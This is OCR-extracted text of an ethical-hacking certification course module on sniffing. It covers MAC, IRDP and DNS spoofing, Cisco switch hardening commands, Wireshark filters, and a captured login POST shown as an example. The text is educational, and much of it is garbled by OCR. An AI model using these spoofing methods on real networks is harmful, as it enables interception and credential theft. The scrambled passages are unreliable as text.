Figure 8.41: Registry Editor

Module 08 Page 1275

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

MAC Spoofing Tools Technitium MAC Address Changer

Technitium MAC Address Changer (TMAC) | @lows you to change (spoof) the Media ‘Access Control (MAC) Address of your

SMAC ‘ttps:/ideconsutting.net

Network Interface Card (NIC) instantly

[GhangNe ed [mat adie T Tow Nn Tasan] pear -Coabe00050) Up.Opwara No ootSs50-2000

MAC Address Changer ‘ttps://wunovirusthanks.org

Sed Obst Ode

Change MAC Address ‘tps: fizardsystems.com

niin MAC Aone oorss0at000 rdware 1D YMOUS\OISTO) oe d:59122e95Sed Misco Capatson Ader One Mest Wa Config as65559FES340738:R50CCZS0BIT14 TOPAP et En TePAPy6: Erbies

Easy Mac Changer

‘https://github.com

IF MakenMAC ses pte 7 Use ae iat MAC aces Whi?

‘Spoof-Me-Now

fcr]

‘https://sourceforge.net

MAC Spoofing Tools =

Technitium MAC Address Changer

Source: https://technitium.com Technitium MAC Address Changer (TMAC) allows address of your NIC instantly. Every NIC has a MAC the manufacturer. This hard-coded MAC address is the Ethernet network (LAN). This tool can set a new the original hard-coded MAC address.

you to change (spoof) address hardcoded in its used by Windows drivers MAC address to your NIC,

As shown in the screenshot, attackers can use TMAC address to perform an attack on the target system.

Module 08 Page 1276

the MAC circuit by to access bypassing

to spoof or change their MAC

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

figi] Technitium MAC Address Changerv6 - by Shreyas Zare

File Action Options Network Connections

Help

[Changed | MAC Address

Ethernet (Kernel Debugger)

No

Ethemet

No

00-00-00-00-00-00

—_00-15-5D-01-80-00

Link Status

Speed

Down, Non Operational

Obps

Up. Operational

Obps

Information | IP Address | Presets |

Connection Details Connection Ethemet

Original MAC Address

Device Microsoft Hyper’ Network Adapter Hardware ID VMBUS\{(9515163-d'3e-46c5-91 3+/2d26985ed0« Config ID (64983588-F693-4023-B9B6-DCC294DB1114} TCPAP v4:

Enabled

TCPAPY¥6:

00-15-5D-01-80-00 Microsoft Corporation (Address: One Microsoft Wa

Active MAC Address

00-15-5D-01-80-00 (Original)

Enabled

Microsoft Corporation

| Change MAC Address 00 - 1A - 9B - 49 - 61 f[o0-14-98) ADEC & Parter AG

(Address: One Microsoft War

. - 4F

Random MAC Address

(Address: Staldenbachstrasse 30, ea

¥ Automatically restart network connection to apply changes

Make new MAC address persistent

[7 Use '02' as first octet of MAC address

Received 485.67 MB (488293901 bytes} ~Speed 490 B/s (490 bytes) Sent 8.32 MB (8719829 bytes} ~Speed_0B/s {0 bytes}

Why?

Figure 8.42: Screenshot of Technitium MAC Address Changer (TMAC)

Some examples of MAC spoofing tools are listed below:

SMAC (https://kIcconsulting.net) MAC Address Changer (https://www.novirusthanks.org)

Change MAC Address (https://lizardsystems.com) Easy Mac Changer (https://github.com) Spoof-Me-Now (https://sourceforge.net)

Module 08 Page 1277

Ethical Hacking and Countermeasures Copyright © by EC-Cout

All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

IRDP Spoofing

CE H

@ ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on their subnet by listening to router advertisement and soliciting messages on their network @ The attacker sends a spoofed IRDP router advertisement message to the host on the subnet, causing it to change its default router to whatever the attacker chooses

‘@ This attack allows the attacker to sniff the traffic and collect valuable information from the packets @

Attackers can use IRDP spoofing to launch man-in-the-middle, denial-of-service, and passive sniffing attacks

ce

Internet

Routing Table Strictly Prohibited

IRDP Spoofing ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. The attacker can add default route entries on a system remotely by spoofing router advertisement messages. As IRDP does not require any authentication, the target host will prefer the default route defined by the attacker over the default route provided by the DHCP server. The attacker accomplishes this by setting the preference level and lifetime of the route at high values to ensure that the target hosts will choose it as the preferred route. This attack succeeds if the attacker launching the attack is on the same network as the victim. In the case of a Windows system configured as a DHCP client, Windows checks the received router advertisements for entries. If there is only one, then it checks whether the IP source address is within the subnet. If so, then it adds the default route entry; otherwise, it ignores the advertisement.

User

<


‘Traffic Sent with IP 10.10.10.2 Mac C

10.10.10.2 MACB

How to Defend Against MAC

Sent 10.10.10.5 Mac B

[ila fEamanen =

10.10.10.5 MAC C

Received Traffic Source IP 10.10.10.2 Mac B

Spoofing

Performing security assessments is the primary aim of an ethical hacker. An ethical hacker attacks a target network or organization with the knowledge and authorization of its management, to find loopholes in the security architecture. However, the job does not end there. Finding those loopholes is a minor task. The most crucial task of ethical hacking is to apply the appropriate countermeasures to security loopholes to fix them. Once you have tested the network for you should apply countermeasures to MAC spoofing countermeasures can be Apply the appropriate countermeasures

MAC spoofing attacks and collected security loopholes, protect the network from further MAC spoofing. Many applied to specific network architectures and loopholes. to your network.

To detect MAC spoofing, it is necessary to know all the MAC addresses in the network. The best way to defend against MAC address spoofing is to place the server behind the router. This is because routers depend only on IP addresses, whereas switches depend on MAC addresses for communication in a network. Making changes to the port security interface configuration is another way to prevent MAC spoofing attacks. Once you enable the port-security command, it allows you to specify the MAC address of the system connected to the specific port. It also allows for specific action to be taken if a port security violation occurs.

You can also implement attacks: =

the following techniques to defend

against MAC

address

spoofing

DHCP Snooping Binding Table: The DHCP snooping process filters untrusted DHCP messages and helps to build and bind a DHCP binding table. This table contains the MAC address, IP address,

lease time, binding type, VLAN

to correspond

untrusted

Module 08 Page 1284

with

interfaces

number,

of a switch.

and interface information

It acts

as a firewall

between

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

untrusted hosts and DHCP servers. It also helps in differentiating between trusted and untrusted interfaces. =

Dynamic ARP Inspection: The system checks the IP-MAC address binding for each ARP packet in a network. While performing a DAI, the system will automatically drop invalid IP—MAC address bindings.

=

IP Source Guard: IP Source Guard is a security feature in switches that restricts the IP traffic on untrusted layer 2 ports by filtering traffic based on the DHCP snooping binding database. It prevents spoofing attacks when the attacker tries to spoof or use the IP address of another host.

=

Encryption: Encrypt the communication prevent MAC spoofing.

=

Retrieval of MAC Address: You should always retrieve the MAC address from the NIC directly instead of retrieving it from the OS.

=

Implementation of IEEE 802.1X Suites: This is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network.

=

AAA (Authentication, Authorization, and Accounting): Use an AAA (Authentication, Authorization, and Accounting) server mechanism to filter MAC addresses subsequently.

sh ip dhcp snooping binding Mackddress IpAddress Lease = Type 2a:33:4e:2£;4a:1e 10.10.10.9 185235 dhep-

snooping

VLAN. 4

between

the access point and computer

Interface FastEthernet3/18

to

10.10.10.1 MACA

DHCP Snooping Enabled Dynamic ARP Inspection Enabl

IFIP and MAC entry in the binding table does not match, then discard the packet Traffic Sent with IP 10.10.10.5 Mac B

10.10.10.2 MACB

10.10.10.5 MAC Cc if the traffic from the

, then traffic is blocked

Figure 8.47: Defending against MAC spoofing

Module 08 Page 1285

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

How to Defend Against VLAN Hopping Defend against Switch Spoofing

Defend against Double Tagging

@ Explicitly configure the ports as access ports and ensure that all access ports are

@

—)

configured not to negotiate trunks:

oP

switchport mode access

ee

switchport mode nonegotiate

—y

Ensure that all trunk ports are configured

not to negoti -gotiate trunks: Switch (config-if)#

trunk

CE H

Lame

switchport mode

Switch (config-if)# switchport mode nonegotiate

@==@

@ Ensure that each access port is assigned with VLAN except the default VLAN (VLAN 1): switchport access vlan 2 ‘@

Ensure that the native VLANs on all trunk

ports are changed to an unused VLAN ID: switchport

‘@

eH

trunk

native

vlan

999

Ensure that the native VLANs on all trunk

ports are explicitly tagged:

vlan dotlq tag native

How to Defend Against VLAN Hopping Defend Against Switch Spoofing Perform the following steps to configure a switch to prevent switch spoofing attacks: =

=

Explicitly configure the ports as access configured not to negotiate trunks: switchport

mode

access

switchport

mode

nonegotiate

ports,

and

ensure

that all access

ports are

Ensure that all trunk ports are configured not to negotiate trunks: switchport

mode

trunk

switchport

mode

nonegotiate

Defend Against Double Tagging Perform the following steps to configure a switch to prevent double tagging attacks: =

Ensure that each access port is assigned with VLAN except the default VLAN (VLAN 1): switchport

=

vlan

2

Ensure that the native VLANs on all trunk ports are changed to an unused VLAN ID: switchport

=

access

trunk

native

vlan

999

Ensure that the native VLANs on all trunk ports are explicitly tagged: vlan

Module 08 Page 1286

dotlq

tag

native

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

C'EH

How to Defend Against STP Attacks To prevent an STP attack, the following security features must be implemented: BPDU Guard

Loop Guard

@ Toenable the BPDU guard on all PortFast edge

@ Toenable the loop guard on an interface:

ports: configure terminal interface gigabiteethernet slot/port

spanning-tree

portfast

configure terminal interface gigabiteethernet slot/port

bpduguard

spanning-tree

Root Guard

‘@

loop

UDLD (Unidirectional Link Detection)

To enable the root guard feature on an

‘@

interface:

configure

guard

terminal

interface gigabiteethernet slot/port spanning-tree guard root

To enable UDLD on an interface: configure

terminal

interface

gigabiteethernet

udld { enable }

| disable

slot/port

| aggressive

Strictly Prohibited

How to Defend Against STP Attacks Implement the following countermeasures to defend against STP attacks on switches: BPDU Guard: BPDU guard must be BPDU from their connected devices. PortFast-enabled ports. This feature network. If BPDU guard is enabled connects

enabled on the ports that should never receive a This is used to avoid the transmission of BPDUs on helps in preventing potential bridging loops in the on a switch interface and an unauthorized switch

to it, the port will be set to errdisable

errdisable traffic.

mode

shuts down

mode

the port and disables

when

it from

a BPDU

is received. The

sending or receiving any

Use the following commands to enable BPDU guard on a switch interface: configure

terminal

interface

gigabiteethernet

spanning-tree

portfast

slot/port

bpduguard

Root Guard: Root guard protects the root bridge and ensures that it remains as the root in the STP topology. It forces the interfaces to become the designated ports (forwarding ports) to prevent the nearby switches from becoming root switches. Therefore, if a port enabled with the root guard feature receives a superior BPDU, it converts that port into a loop inconsistent state (not errdisabled), thus protecting an STP topology change. This port remains inactive only for that specific switch/switches attempting to change the STP topology. This port remains in down state until the issue is resolved.

Module 08 Page 1287

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

Use the following commands to enable the root guard feature on a switch interface: configure

terminal

interface

gigabiteethernet

spanning-tree

=

guard

slot/port

root

Loop Guard: Loop guard improves the stability of the network by preventing it against the bridging loops. It is generally used to protect against a malfunctioned switch. Use the following commands to enable the loop guard feature on a switch interface: configure

terminal

interface

gigabiteethernet

spanning-tree

=

guard

slot/port

loop

_UDLD (Unidirectional Link Detection): UDLD enables devices to detect the existence of unidirectional links and further disable the affected interfaces in the network. These unidirectional links in the network can cause STP topology loops. Use the following command to enable UDLD on a switch interface: configure

terminal

interface

gigabiteethernet

udld

Module 08 Page 1288

{

enable

|

disable

|

slot/port aggressive

}

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

DNS Poisoning Techniques @

C \EH

DNS poisoning is a technique that tricks a DNS server into believing that it has received authentic information

©@

It results in the substitution of a false IP address at the

‘@ The attacker can create fake DNS entries for the

when it has not received any @

DNS level where the web addresses are converted into numeric IP addresses

Itallows the attacker to replace IP address entries for a target site on a given DNS server with the IP

address of the server he/she controls

server (containing malicious content) with names similarto that of the target server

Intranet DNS

DNS Server

re

Internet DNS Spoofing (Remote network)

‘Spoofing (Local network) DNS Cache Poisoning

Proxy Server >» DNS Poisoning

Sniffing Technique: DNS Poisoning This section describes DNS poisoning techniques to sniff the DNS traffic of a target network. Using this technique, an attacker can obtain the ID of the DNS request by sniffing and can send a malicious reply to the sender before the actual DNS server responds.

DNS Poisoning Techniques DNS is the protocol that translates a domain name (e.g., www.eccouncil.org) into an IP address (e.g., 208.66.172.56). The protocol uses DNS tables that contain the domain name and its equivalent IP address stored in a distributed large database. In DNS poisoning, also known as DNS spoofing, the attacker tricks a DNS server into believing that it has received authentic information when, in reality, it has not received any. The attacker tries to redirect the victim to a malicious server instead of the legitimate server. The attacker does this by manipulating the DNS table entries in the DNS. This results in substitution of a false IP address at the DNS level,

where web addresses are converted into numeric IP addresses.

When the victim tries to access a website, the attacker manipulates the entries in the DNS table so that the victim’s system redirects the URL to the attacker’s server. The attacker replaces IP address entries for a target site on a given DNS server with the IP address of the server (malicious server) he/she controls. The attacker can create fake DNS entries for the server (containing malicious content) with the same names as that of the target server. Thus, the victim connects to the attacker’s server without realizing it. Once the victim connects to the attacker’s server, the attacker can compromise the victim’s system and steal data.

Module 08 Page 1289

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

DNS poisoning is possible using the following techniques: =

Intranet DNS Spoofing

=

Internet DNS Spoofing

=

Proxy Server DNS Poisoning

=

DNS Cache Poisoning

Module 08 Page 1290

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Intranet DNS Spoofing

CE H

@ In this technique, the attacker's system must be connected to the local area network (LAN) and be able to sniff packets ‘@

It works well against switches with ARP Poison Routing

Whatis the

Router 1P 10.0.0.254

address of ras com?

John

A

sees,

(P:10.0.0.3) ?

‘ Website Real wwwxsecurty.com

router and redirects DNS requests to his machine

a

‘Attacker sniffs th

islocated at

DNS Response

Attacker runs

arpspoof/dnsspoof

Fake Website

Intranet DNS Spoofing An attacker can perform an intranet DNS spoofing attack on a switched LAN with the help of the ARP poisoning technique. To perform this attack, the attacker must be connected to the LAN and be able to sniff the traffic or packets. An attacker who succeeds in sniffing the ID of the DNS request from the intranet can send a malicious reply to the sender before the actual DNS

server.

The diagram describes how an attacker performs an intranet DNS spoofing.

What is the IPeddress of

Router

www. xsecurity.com?-

A John (IP: 10.0.0.3)

IP 10.0.0.254

: -@ seve ae Rete eee sey a

Real Website

www.xsecurity.com IP: 200.0.0.45

a a A

th Attacker hnocts Sees (4) router and redirects |DNS requeststo his machine

i sniffs theand # Attackersential

an‘ redirectscredential the request

www xsecurity.com 1s located at

DNS Response

Attacker runs

arpspoof/dnsspoof

Fake Website

Figure 8.48: Intranet DNS spoofing

In the diagram, the attacker poisons the router by running arpspoof/dnsspoof to redirect DNS requests of clients to the attacker’s machine. When a client (John) sends a DNS request to the router, the poisoned router sends the DNS request packet to the attacker’s machine. Upon Module 08 Page 1291

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

receiving the DNS request, the attacker sends a fake DNS response that redirects the client to a fake website set up by the attacker. The attacker owns the website and can see all the information submitted by the client to that website. Thus, the attacker can sniff sensitive data, such as passwords, submitted to the fake website. The attacker retrieves the required information and then redirects the client to the real website.

Module 08 Page 1292

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

CEH

Internet DNS Spoofing ‘@

Internet DNS Spoofing, the attacker infects John’s machine with a Trojan and changes his DNS IP address

:

to that of the attacker's

Whatis the addressof ww security com?

John’s Browser connects to 65.0.0.2

so E ‘Attacker sniffs the credential and redirects the requestto realwebsite

Fake Website

(1P: 10.0.0.

1P:65.0.0.2

Real Wel

www.xsecurity.com IP: 200.0.0.45,

DNSRequest } to200.0.02

‘Attacker infects John's computer by ‘changing his DNS IP address to 200.0.0.2

Attacker runs DNS Server

_

(IP: 200.0.0.2)

Internet DNS Spoofing Internet DNS poisoning is also known as remote DNS poisoning. Attackers can perform DNS spoofing attacks on a single victim or on multiple victims anywhere in the world. To perform this attack, the attacker sets up a rogue DNS server with a static IP address. Attackers perform Internet DNS spoofing with the help of Trojans when the victim’s system connects to the Internet. This is an MITM attack in which the attacker changes the primary DNS entries of the victim’s computer. The attacker replaces the victim’s DNS IP address with a fake IP address that resolves to the attacker’s system. Thus, the victim’s traffic redirects to the attacker’s system. At this point, the attacker can easily sniff the victim’s confidential information.

The figure illustrates an attacker performing Internet DNS spoofing. The attacker infects John’s machine with a Trojan and changes his DNS IP address to that of the attacker. Whats the iPadaress of wor xscurty com? oe

John's Browser

(1P: John 10.0.0.5)

Attacker sniff the eredem and redirects the request to

Fake Website IP: 65.002

cha

DNS IP address to 200.0.0.2

-O-

realwebsite

>

q

a o

Real Website

Attacker runs DNS Server (IP: 200.0.0.2)

Figure 8.49: Internet DNS Spoofing

Module 08 Page 1293

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

CEH

Proxy Server DNS Poisoning @ The attacker sends a Trojan to John’s machine that changes his proxy server settings in Internet Explorer to that of the attacker's and redirects to the fake website Whatis the address of wun gecurity com?

o

John

Real Website www.xsecurity.com (1P:200.0.0.45)

a a

‘Attacker’s fake website sn the credential and redirectsthe request to the real websit

A

‘computer by changing his IE Proxy address to 200.0.0.2

zy

request to the Fake webs!

Fake Website

Attacker runs Proxy Server 1P: 200.0.0.2

(IP:65.0.0.2)

Strictly Prohibited

Proxy Server DNS Poisoning In the proxy server DNS poisoning technique, the attacker sets up a proxy server on the attacker’s system. The attacker also configures a fraudulent DNS and makes its IP address a primary DNS entry in the proxy server. The attacker changes the proxy server settings of the victim with the help of a Trojan. The proxy serves as a primary DNS and redirects the victim’s traffic to the fake website, where the attacker can sniff the confidential information of the victim and then redirect the request to the real website. As shown in the figure, an attacker sends a Trojan to John’s machine that changes his proxy server settings in Internet Explorer to those of the attacker, and redirects the request to a fake website. ‘Whats the address of www xsecurty.com?

: o

Real Website

John

Attacker's fake website sniffs =

the eredential and redirects the # request to the real website !

(IP: 10.0.0.5)

@

All of John’s Web requests go through Attacker’s machi Attacker infects John’s computer by changing his IE Proxy address to 200.0.0.2

Attacker sends John’s, request to the Fake website

Attacker runs Proxy Server IP: 200.0.0.2

Fake Website (IP: 5.0.0.2)

Figure 8.50: Proxy server DNS poisoning

Module 08 Page 1294

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

DNS Cache Poisoning

CE H

@ DNS cache poisoning refers to altering or adding forged DNS records into the DNS resolver cache so that a DNS query is redirected to a malicious site G

If the DNS resolver cannot validate that the DNS responses have been received from an authoritative source, it will cache the incorrect entries locally, and serve them to users who make a similar request

Whatis the \Paddress of wwewssecuriy.com?

Authoritative DNS server for xsecutity.com

ee a

‘Attacker's fake websit 46A4026/sM1™ > Form iter: *VIEWSTATEGENERATOR™ = "CZEE9ABS" > Form item: *EVENTVALIDATION" = "/wEdAARJUUDOrbpOx NM xt™ LARHNE CRU 9a£308910en0G6cPO02LAKSaxRe6 MQ} 2F3 SAWSKUgaKANSGXTZREGO7OLAP> Form ites: > Form ites: > Form ites: (0630 HEME] 19 70 G0 06 So 4F 52 S4 20 2F 20 48 S454 Bp PO ST / © 7 The window size value from the TCP header (tcp.window size valuel.2 bytes Packets: 1793 - Displayed: 69 (3.8%) - Dropped: 0 (0.0%) Profle: Default Figure 8.54: Wireshark capturing TCP Stream

(ERE

eeeS ORT |

sebeeZeGPeececdeeceeke

MTT 4.4 Host! wm.moviescope.com User-Agent: Mozilla/5.0 (Windows NT 10. rv: 8) Gecko/20100101 Firetox/78.9 ‘Accept: text/ntml, application/xntal+xnl, application/xal;q=0 image/webp, */*;Q=0. ‘Accept-Language: en-US, en;q-0.5 ‘Accept-Encoding: gzip, deflate Content-Type: application/x-vaw-forn-urlencoded Content-Lengtn: 324 Origin: nttp://wa.moviescope.com ONT: 4 Connection: keep-alive Referer Nttp://me.noviescope.con/ Upgr: Insecure-Requests: 1 DzONIES ESMOCSN 120T dkZHS LOcnIK2BBt sUTE SHAZFWLGLEGTSuM __VIEWSTATE=S2F wEPOMILLT W18__VIEWSTATEGENERATOR=C2EE' EVENTVALIDATION=%2F wEdAAR JUUDSr DpOx NNN) xtMLURWMEtrRu 119aE308g1Dcn0G6cPO0; \3qX7ZRFQOTELoPacunnsgi 33) 16UFNCYULY Yentx221Qv0B9U%3Dat| enLogin=LoginkTTP/1.1 382 Found Cache-Controt: prival Content-Type: text/html; charset Location: /index.aspx Server: Microsoft -11S/19.8 8, 30319 Date: Wed, 18 May 2022 12:50:53 GHT Content-Length: 128

chead>ddject movede/titten in2nthdart med tn ch hrafe*/indaw asmetwhernefam) ¢K2%

16 chent pits, 24 server pts 31 turns

Entire conversation (S46kB) Find: Filter Out This Stream

= Show data as ASCII Print

|| Save as

Back

= Stream |25 |= [Find Next | Xcose | F {Help

Figure 8.55: Password revealed in a TCP Stream Module08 Page 1304

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Display Filters in Wireshark

CE H

Display filters are used to change the view of packets in the captured files

EB

Display

ritesingby

|

Protocol

Monitoring

example: Type the protocol in the filter box; arp, http, tcp, udp, ds, or ip © top.port==23

[2 |

theSpecific

ER

Filtering by

wouter Addresses

| Eicisr T iolo.o's

[4 |

IPFiltering Addressby

|

ip addr == 10.0.0.4

|

© ip.dst == 10.0.1.50 && frame.pkt_len > 400 p && frame.number > 15 && frame.number < 30 esip.addr == 10.0.1.12 && icmemp

|

Ports

92.168.1.100 machine

92.168.1.100

&& tcp.port==23

ip.addr == 10.0.0.4 or

Other Filters

5 |

9

@ ip. sro==205.153.63.30 or ip.dst==205.153.63.30

Display Filters in Wireshark Source: https://wiki.wireshark.org Wireshark features display filters that filter traffic address, port, etc. Display filters are used to change set up a filter, type the protocol name, such as arp, of Wireshark. Wireshark can use multiple filters at a

on the target network by protocol type, IP the view of packets in the captured files. To http, tcp, udp, dns, and ip, in the filter box time.

Some of the display filters in Wireshark are listed below:

=

Display Filtering by Protocol Example: Type the protocol in the filter box: arp, http, tcp, udp, dns, ip

=

Monitoring the Specific Ports Oo

tep.port==23

192.168.1.100 machine 192.168.1.100 && tcp.port==23

°

=

Filtering by Multiple IP Addresses ©

=

==

10.0.0.4

or

ip.addr

==

10.0.0.5

&&

frame.pkt_len

Filtering by IP Address Oo

=

ip.addr ip.addr

==

10.0.0.4

Other Filters oO

ip.dst

©

ip.addr == 10.0.1.12 frame.number < 30

oO

ip.sre==205.153.63.30

Module 08 Page 1305

==

10.0.1.50

&& or

icmp

&&

>

400

frame.number

>

15

&&

ip.dst==205.153.63.30

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Additional Wireshark Filters

udp contains 33:27:58 Sets a filter for the HEX values of 0x33 0x27 OxS8 at any offset

tcp.analysis.

&

http. request Displays all HTTP GET requests Retransmission

Displays all retransmissions in the trace 5

tcp contains

3)

Displays all TCP resets

IX q

Lox]

tep. flags. reset==1

traffic

Displays all TCP packets that contain the word “traffic”

BS

o

CE H ! (arp or icmp or dns) Masks out arp, icmp, dns, or other protocols and allows you to view traffic of your interest tcp.port == 4000 Sets filter for any TCP packet with 4000 as a source or destination port tep.port eq 25 or icmp Displays only SMTP (port 25) and ICMP traffic ip.sre==192.168.0.0/16 and ip.dst==192.168.0.0/16 Displays only traffic in the LAN (192.168.x.x), between workstations and servers — no Internet ip.sre != xxx.xxx.xxx.xxx && ip.dst != 200K 200.2008. 200K 6 Sip Filterby a protocol (e.g. SIP) and filter out unwanted IPs

Additional Wireshark Filters Source: https://wiki.wireshark.org Some examples of additional Wireshark filters are listed below: ="

tcep.flags.reset==

Displays all TCP resets =

udp

contains

33:27:58

Sets a filter for the hex values of 0x33 0x27 0x58 at any offset ="

http.request

Displays all HTTP GET requests ="

tcp.analysis.retransmission

Displays all retransmissions in the trace =

tcp

contains

traffic

Displays all TCP packets that contain the word “traffic” =!

(arp

or

icmp

or

dns)

Masks out arp, icmp, dns, or other protocols and allows you to view the traffic of your

interest =

tcep.port

==

4000

Sets a filter for any TCP packet with 4000 as a source or destination port

Module 08 Page 1306

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

=

tcp.port

eq

25

or

icmp

Displays only SMTP (port 25) and ICMP traffic ="

ip.src==192.168.0.0/16

and

ip.dst==192.168.0.0/16

Displays only traffic in the LAN (192.168.x.x), between workstations and servers—no

Internet ="

aip.sre

!=

xxx.xxx.xxx.xxx

&&

ip.dst

XXX. XXX.XXX.xXxx

&&

Sip

Filters by a protocol (e.g., SIP) and filters out unwanted Ips

Module 08 Page 1307

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

CEH

Sniffing Tools Riverbed Packet Analyzer Plus

Riverbed Packet Analyzer Plus performs the realtime network packet analysis and reporting of large trace files

a portable network performance analysis and Capsa Portable | Capsa, diagnostics tool, provides packet capture and analysis Network Analyzer capabilities with an easy-to-use interface

oor m

Gamtmm 0s os oe Tntes Janu olosoR com

‘tps nnn riverbed com

CEH

Sniffing Tools (Cont’d)

RITA (Real Intelligence Threat Analytics)

OmniPeek

‘etps://w.actvecountermeasures.com

OmniPeeksniffer displaysa Google Mapin the OmniPeek capture window showing the locations of all the public IP addressesof captured packets

Observer Analyzer ‘tp: sivioltionscom PRTG Network Monitor ‘etps://wneu.pacsster.com SolarWinds Deep Packet

Inspection and Analysis -ps://un soled com

"tesa Bveaction com

Xplico ‘ntps://unosptcaorg

Sniffing Tools

Module 08 Page 1308

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

=

Exam 312-50 Certified Ethical Hacker

Riverbed Packet Analyzer Plus

Source: https://www.riverbed.com Riverbed Packet Analyzer Plus performs the real-time network packet analysis and reporting of large trace files using an intuitive GUI and a broad selection of pre-defined analysis views. Use Packet Analyzer Plus with Riverbed AppResponse or any locally presented trace files to quickly identify and troubleshoot complex network and application performance issues down to the bit level through full integration with Wireshark.

Boar R00

Tae-conrn Folder

Ad Trace Tiaceries

Devices ¥ FE cal System,

1 Wey Microsof Corporation (Ga Bardictn Over Time

B/9

- ax

renin

sms pis sx

@

paste sources

robes | Seich TigGetting rs on Gener

Started

.o8ony

ave

ry

Z

‘% Detach

ew

Chart

char Selection

«

Network Usage by Port Name Filters (None)

a

Total Throughput Wars

Wincicne

Sottos

4 Filters.

@ebss

Views “Custom ‘Local System ‘D Recently Use i Barcwicth Over Time IP Comersations Ba Network Usage Anatais

[i i Protocol Distsbution ITeatic Anadis lim bandwith Usage

Preicue 323% 250

i

cd

Simons mincicue

reps 230%) nits

Pd LAN and Network Multi-Segment Analysis MS mane (540%) formance and Errors * Notes alkers and Conversations Current Selection: 2134329 - 2134340 (11 s) @ 1 sec - Total Window: 21-4329 - 214330 - Drop After: 1 Day ‘Network Usage by Port Name on vifg0 at 9:43 PM. - Selected Chart: Total Throughput Figure 8.56: Screenshot of Riverbed Packet Analyzer Plus

Module08 Page 1309

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

Capsa Portable Network Analyzer

Source: https://www.colasoft.com Capsa, a portable network performance analysis and diagnostics tool, provides packet capture and analysis with an easy-to-use interface, allowing users to protect and monitor networks in a critical business environment. An attacker can use this tool to sniff packets from network vulnerabilities. iew

the target

network

and

OO

‘Analysis Settings

| Uiieation 629

detect

@ Hep

| Teffic Chartbps) | Packet Buffer 128.0 MB

TP Endpoiart nt[1

> Online Resource

a]

a

BW Protocol Explorer (1)

8D & By 4 WS &- ©

MACExplorer@) P explorer) VolP Explorer Process Explorer) Application Explorer ()

lick here Live Demo Find Top Takers in Netnork ho Is Using Network Bandwidth? How to Detect ARP Attacks How to Detect Netork Loop How to Monit IM Message [More Videos.-] How-To's

[Zl [Gy [iy [Gl Gl

Default | WD Ethemet ‘DyCapture-

- 1000Mbps J Bandwidth

"0 Ready Inactive 00:01:02 | ¥7482

a

How to Honitor Network Traffic Monitor Employee Website s Visits why? cannot capture ALL traffic, Create Traffic Utitzation Chart [entistart a wireless Capture [ More in Knowledgebase..]

How to Use Capsa

Dalam Explorer ©0

OO

v

OO

Figure 8.57: Screenshot of Capsa Portable Network Analyzer

Module 08 Page 1310

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Sniffing =

Exam 312-50 Certified Ethical Hacker

OmniPeek

